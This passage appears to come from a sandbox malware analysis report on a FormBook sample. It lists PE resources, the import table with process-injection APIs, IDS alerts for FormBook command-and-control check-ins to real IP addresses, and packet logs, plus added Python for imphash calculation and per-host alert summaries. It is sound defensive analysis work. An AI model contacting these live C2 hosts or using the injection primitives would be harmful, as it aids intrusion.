RT_ICON       | 0xab5c8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors   | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xab6f0 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                        | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xab818 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                        | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xab940 | 0x668  | Device independent bitmap graphic, 48 x 96 x 4, image size 1152                       | English  | Great Britain | 0.48109756097560974
RT_ICON       | 0xabfa8 | 0x2e8  | Device independent bitmap graphic, 32 x 64 x 4, image size 512                        | English  | Great Britain | 0.5672043010752689
RT_ICON       | 0xac290 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128                        | English  | Great Britain | 0.6418918918918919
RT_ICON       | 0xac3b8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English  | Great Britain | 0.7044243070362474
RT_ICON       | 0xad260 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English  | Great Britain | 0.8077617328519856
RT_ICON       | 0xadb08 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors  | English  | Great Britain | 0.5903179190751445
RT_ICON       | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600                      | English  | Great Britain | 0.5503112033195021
RT_ICON       | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224                      | English  | Great Britain | 0.6050656660412758
RT_ICON       | 0xb16c0 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1088                      | English  | Great Britain | 0.7553191489361702
RT_MENU       | 0xb1b28 | 0x50   | data                                                                                  | English  | Great Britain | 0.9
RT_DIALOG     | 0xb1b78 | 0xfc   | data                                                                                  | English  | Great Britain | 0.6507936507936508
RT_STRING     | 0xb1c78 | 0x530  | data                                                                                  | English  | Great Britain | 0.33960843373493976
RT_STRING     | 0xb21a8 | 0x690  | data                                                                                  | English  | Great Britain | 0.26964285714285713
RT_STRING     | 0xb2838 | 0x4d0  | data                                                                                  | English  | Great Britain | 0.36363636363636365
RT_STRING     | 0xb2d08 | 0x5fc  | data                                                                                  | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xb3308 | 0x65c  | data                                                                                  | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xb3968 | 0x388  | data                                                                                  | English  | Great Britain | 0.377212389380531
RT_STRING     | 0xb3cf0 | 0x158  | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                      | English  | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84   | data                                                                                  | English  | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14   | data                                                                                  | English  | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14   | data                                                                                  | English  | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14   | data                                                                                  | English  | Great Britain | 1.25
RT_VERSION    | 0xb3f18 | 0x19c  | data                                                                                  | English  | Great Britain | 0.5339805825242718
RT_MANIFEST   | 0xb40b8 | 0x26c  | ASCII text, with CRLF line terminators                                                | English  | United States | 0.5145161290322581
DLL: Imports
WSOCK32.dll: __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll: VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll: WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL: EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll: CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll: HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
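The Import Hash given in the header (d3bf8a7746a8d1ee8f6e5960c3f69378) is derived from exactly the import list above, and the same list is what the "writes to foreign memory regions" verdict rests on (OpenProcess, VirtualAllocEx, WriteProcessMemory and ReadProcessMemory are all imported from KERNEL32, while CreateRemoteThread is not). The Python below is an added example, not code from Joe Sandbox: it implements the widely used imphash normalisation (as in pefile: lowercase the library name with its .dll/.ocx/.sys suffix removed, lowercase the function name, join as "lib.func" in import-directory order, MD5 the comma-separated string) and a small capability check over the import names. It assumes Joe Sandbox uses that same imphash definition; the import list embedded in the block is a constructed excerpt, so its hash will not equal the report's value. Reproducing d3bf... requires every import in the order the import directory lists them.

```python
import hashlib
from typing import Iterable, List, Optional, Sequence

_STRIP_SUFFIXES = ("dll", "ocx", "sys")

# Win32 APIs that make up the classic remote-process write/execute primitives.
# The first four appear in the KERNEL32 list above; CreateRemoteThread does not.
INJECTION_APIS = {
    "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
    "CreateRemoteThread", "QueueUserAPC", "SetThreadContext", "ResumeThread",
}


def normalise_import(lib: str, func: Optional[str], ordinal: Optional[int] = None) -> str:
    """Canonical 'lib.func' token for one import entry. Imports by ordinal
    (no name) become 'lib.ordN', pefile's fallback when no name table applies
    (assumption: no ordinal-to-name lookup is used here)."""
    lib = lib.lower()
    parts = lib.rsplit(".", 1)
    if len(parts) == 2 and parts[1] in _STRIP_SUFFIXES:
        lib = parts[0]
    if func is None:
        if ordinal is None:
            raise ValueError("import entry needs a name or an ordinal")
        func = f"ord{ordinal}"
    return f"{lib}.{func.lower()}"


def imphash(imports: Iterable[Sequence]) -> str:
    """MD5 over the normalised, comma-joined import list. Entries are
    (lib, func) or (lib, None, ordinal). Order matters: the same imports in
    a different order produce a different hash."""
    tokens = []
    for entry in imports:
        lib, func = entry[0], entry[1]
        ordinal = entry[2] if len(entry) > 2 else None
        tokens.append(normalise_import(lib, func, ordinal))
    return hashlib.md5(",".join(tokens).encode()).hexdigest()


def injection_primitives(imports: Iterable[Sequence]) -> List[str]:
    """Names from INJECTION_APIS present in the import list, sorted."""
    names = {entry[1] for entry in imports if entry[1]}
    return sorted(names & INJECTION_APIS)


# Constructed excerpt of the import table above (a few entries per DLL, in
# table order). Not the full list, so its imphash differs from the report's.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", "__WSAFDIsSet"), ("WSOCK32.dll", "setsockopt"),
    ("KERNEL32.dll", "OpenProcess"), ("KERNEL32.dll", "VirtualAllocEx"),
    ("KERNEL32.dll", "WriteProcessMemory"), ("KERNEL32.dll", "ReadProcessMemory"),
    ("KERNEL32.dll", "ResumeThread"),
    ("ADVAPI32.dll", "CreateProcessAsUserW"),
]

if __name__ == "__main__":
    print("imphash of excerpt:", imphash(SAMPLE_IMPORTS))
    print("injection primitives:", injection_primitives(SAMPLE_IMPORTS))
```

Because imphash is order-sensitive and case-insensitive, it is a useful pivot for clustering samples built with the same toolchain and import layout, but a trivial re-link (or an added import) changes it; treat a matching imphash as a lead, not as proof of the same family.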
Language of compilation system   Country where language is spoken
English                          Great Britain
English                          United States
Timestamp                        SID      Signature                                      Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-09-25T11:36:55.380755+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52103        148.72.152.174  80         TCP
2024-09-25T11:36:55.380755+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52103        148.72.152.174  80         TCP
2024-09-25T11:37:16.578015+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52104        3.33.130.190    80         TCP
2024-09-25T11:37:19.136334+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52105        3.33.130.190    80         TCP
2024-09-25T11:37:21.688958+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52106        3.33.130.190    80         TCP
2024-09-25T11:37:24.230696+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52107        3.33.130.190    80         TCP
2024-09-25T11:37:24.230696+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52107        3.33.130.190    80         TCP
2024-09-25T11:37:30.189995+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52108        172.191.244.62  80         TCP
2024-09-25T11:37:32.652322+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52109        172.191.244.62  80         TCP
2024-09-25T11:37:35.207083+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52110        172.191.244.62  80         TCP
2024-09-25T11:37:37.743830+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52111        172.191.244.62  80         TCP
2024-09-25T11:37:37.743830+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52111        172.191.244.62  80         TCP
2024-09-25T11:37:44.123012+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52112        172.96.191.39   80         TCP
2024-09-25T11:37:46.664263+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52113        172.96.191.39   80         TCP
2024-09-25T11:37:49.179941+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52114        172.96.191.39   80         TCP
2024-09-25T11:37:51.714838+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52115        172.96.191.39   80         TCP
2024-09-25T11:37:51.714838+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52115        172.96.191.39   80         TCP
2024-09-25T11:37:57.561999+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52116        217.70.184.50   80         TCP
2024-09-25T11:38:00.099887+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52117        217.70.184.50   80         TCP
2024-09-25T11:38:02.652253+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52118        217.70.184.50   80         TCP
2024-09-25T11:38:05.211275+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52119        217.70.184.50   80         TCP
2024-09-25T11:38:05.211275+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52119        217.70.184.50   80         TCP
2024-09-25T11:38:11.586095+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52120        63.250.47.40    80         TCP
2024-09-25T11:38:14.149666+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52121        63.250.47.40    80         TCP
2024-09-25T11:38:16.688710+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52122        63.250.47.40    80         TCP
2024-09-25T11:38:19.232099+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52123        63.250.47.40    80         TCP
2024-09-25T11:38:19.232099+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52123        63.250.47.40    80         TCP
2024-09-25T11:38:24.904088+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52124        91.184.0.200    80         TCP
2024-09-25T11:38:27.458436+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52125        91.184.0.200    80         TCP
2024-09-25T11:38:30.000561+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52126        91.184.0.200    80         TCP
2024-09-25T11:38:32.552612+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52127        91.184.0.200    80         TCP
2024-09-25T11:38:32.552612+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52127        91.184.0.200    80         TCP
2024-09-25T11:38:38.365794+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52128        13.248.169.48   80         TCP
2024-09-25T11:38:40.949790+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52129        13.248.169.48   80         TCP
2024-09-25T11:38:43.527376+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52130        13.248.169.48   80         TCP
2024-09-25T11:38:46.060671+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52131        13.248.169.48   80         TCP
2024-09-25T11:38:46.060671+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52131        13.248.169.48   80         TCP
2024-09-25T11:39:06.101770+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52136        43.242.202.169  80         TCP
2024-09-25T11:39:08.656855+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52137        43.242.202.169  80         TCP
2024-09-25T11:39:11.202053+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.7  52138        43.242.202.169  80         TCP
2024-09-25T11:39:13.754391+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.7  52139        43.242.202.169  80         TCP
2024-09-25T11:39:13.754391+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.7  52139        43.242.202.169  80         TCP
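Two things in the alert table above are easy to misread. First, every GET check-in fires two rules on the same flow (ET 2050745 and ETPRO 2855465), so counting alerts overstates the number of connections by one per host. Second, the sample walks through nine destinations with the same cadence, three POST check-ins followed by one GET, each on a fresh source port, which is the pattern an analyst wants summarised per host rather than read row by row. The Python below is an added example, not Joe Sandbox code: it parses rows in the column order of the table, deduplicates by flow tuple, and reports POST/GET counts and the SIDs seen per destination. The embedded rows are transcribed from the first three destinations of the table above; the column layout (timestamp, SID, signature, severity, source IP, source port, destination IP, destination port, protocol) is assumed from the table header. Hosts that appear here are candidates for blocking and retro-hunting, but the report alone does not say which of them were live at analysis time.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Rows transcribed from the alert table above (first three destinations);
# the full table lists nine. Whitespace-separated, signature text in the middle.
ALERTS = """\
2024-09-25T11:36:55.380755+0200 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 1 192.168.2.7 52103 148.72.152.174 80 TCP
2024-09-25T11:36:55.380755+0200 2855465 ETPRO MALWARE FormBook CnC Checkin (GET) M2 1 192.168.2.7 52103 148.72.152.174 80 TCP
2024-09-25T11:37:16.578015+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52104 3.33.130.190 80 TCP
2024-09-25T11:37:19.136334+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52105 3.33.130.190 80 TCP
2024-09-25T11:37:21.688958+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52106 3.33.130.190 80 TCP
2024-09-25T11:37:24.230696+0200 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 1 192.168.2.7 52107 3.33.130.190 80 TCP
2024-09-25T11:37:24.230696+0200 2855465 ETPRO MALWARE FormBook CnC Checkin (GET) M2 1 192.168.2.7 52107 3.33.130.190 80 TCP
2024-09-25T11:37:30.189995+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52108 172.191.244.62 80 TCP
2024-09-25T11:37:32.652322+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52109 172.191.244.62 80 TCP
2024-09-25T11:37:35.207083+0200 2855464 ETPRO MALWARE FormBook CnC Checkin (POST) M3 1 192.168.2.7 52110 172.191.244.62 80 TCP
2024-09-25T11:37:37.743830+0200 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 1 192.168.2.7 52111 172.191.244.62 80 TCP
2024-09-25T11:37:37.743830+0200 2855465 ETPRO MALWARE FormBook CnC Checkin (GET) M2 1 192.168.2.7 52111 172.191.244.62 80 TCP
"""

# The signature is free text, so anchor on the fixed fields around it: the
# single-digit severity, then IP/port pairs and the protocol at the end.
ROW = re.compile(
    r"^(?P<ts>\S+)\s+(?P<sid>\d+)\s+(?P<sig>.+?)\s+(?P<sev>\d)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\d+)\s+(?P<dst>\S+)\s+(?P<dport>\d+)\s+(?P<proto>\S+)$"
)


def parse_alerts(text: str) -> List[dict]:
    """Parse alert rows into dicts; raise on any line the layout does not fit."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unparsed alert line: {line!r}")
        d = m.groupdict()
        for key in ("sid", "sev", "sport", "dport"):
            d[key] = int(d[key])
        d["method"] = "POST" if "(POST)" in d["sig"] else "GET" if "(GET)" in d["sig"] else "OTHER"
        rows.append(d)
    return rows


def summarise_by_destination(rows: List[dict]) -> Dict[str, dict]:
    """Per destination: distinct flows per HTTP method and the set of SIDs.
    Flows are keyed on (src, sport, dst, dport) so that two signatures firing
    on the same GET count as one connection."""
    flows = defaultdict(set)
    sids = defaultdict(set)
    for r in rows:
        flows[(r["dst"], r["method"])].add((r["src"], r["sport"], r["dst"], r["dport"]))
        sids[r["dst"]].add(r["sid"])
    summary: Dict[str, dict] = {}
    for (dst, method), fl in flows.items():
        summary.setdefault(dst, {"POST": 0, "GET": 0, "OTHER": 0})[method] += len(fl)
    for dst, entry in summary.items():
        entry["sids"] = sorted(sids[dst])
    return summary


def candidate_c2_hosts(summary: Dict[str, dict]) -> List[str]:
    """Destinations that received at least one check-in, sorted for block lists."""
    return sorted(dst for dst, e in summary.items() if e["POST"] + e["GET"] > 0)


if __name__ == "__main__":
    for dst, entry in summarise_by_destination(parse_alerts(ALERTS)).items():
        print(dst, entry)
```

The first destination in the table (148.72.152.174) only shows a GET, which is consistent with the capture starting mid-cycle rather than with a different behaviour; the per-host counts make that visible immediately, whereas the raw alert list hides it among duplicate rows.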
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 25, 2024 11:36:54.870913982 CEST  52103        80         192.168.2.7     148.72.152.174
Sep 25, 2024 11:36:54.875866890 CEST  80           52103      148.72.152.174  192.168.2.7
Sep 25, 2024 11:36:54.875978947 CEST  52103        80         192.168.2.7     148.72.152.174
Sep 25, 2024 11:36:54.884459972 CEST  52103        80         192.168.2.7     148.72.152.174
Sep 25, 2024 11:36:54.889302015 CEST  80           52103      148.72.152.174  192.168.2.7
Sep 25, 2024 11:36:55.380481958 CEST  80           52103      148.72.152.174  192.168.2.7
Sep 25, 2024 11:36:55.380502939 CEST  80           52103      148.72.152.174  192.168.2.7
Sep 25, 2024 11:36:55.380754948 CEST  52103        80         192.168.2.7     148.72.152.174
Sep 25, 2024 11:36:55.384526014 CEST  52103        80         192.168.2.7     148.72.152.174
Sep 25, 2024 11:36:55.389400005 CEST  80           52103      148.72.152.174  192.168.2.7
Sep 25, 2024 11:37:16.116061926 CEST  52104        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:16.122270107 CEST  80           52104      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:16.122358084 CEST  52104        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:16.133428097 CEST  52104        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:16.138236046 CEST  80           52104      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:16.577930927 CEST  80           52104      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:16.578015089 CEST  52104        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:17.636187077 CEST  52104        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:17.719436884 CEST  80           52104      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:18.654828072 CEST  52105        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:18.659657955 CEST  80           52105      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:18.659785032 CEST  52105        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:18.671310902 CEST  52105        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:18.676173925 CEST  80           52105      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:19.136231899 CEST  80           52105      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:19.136333942 CEST  52105        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:20.183058023 CEST  52105        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:20.188035965 CEST  80           52105      3.33.130.190    192.168.2.7
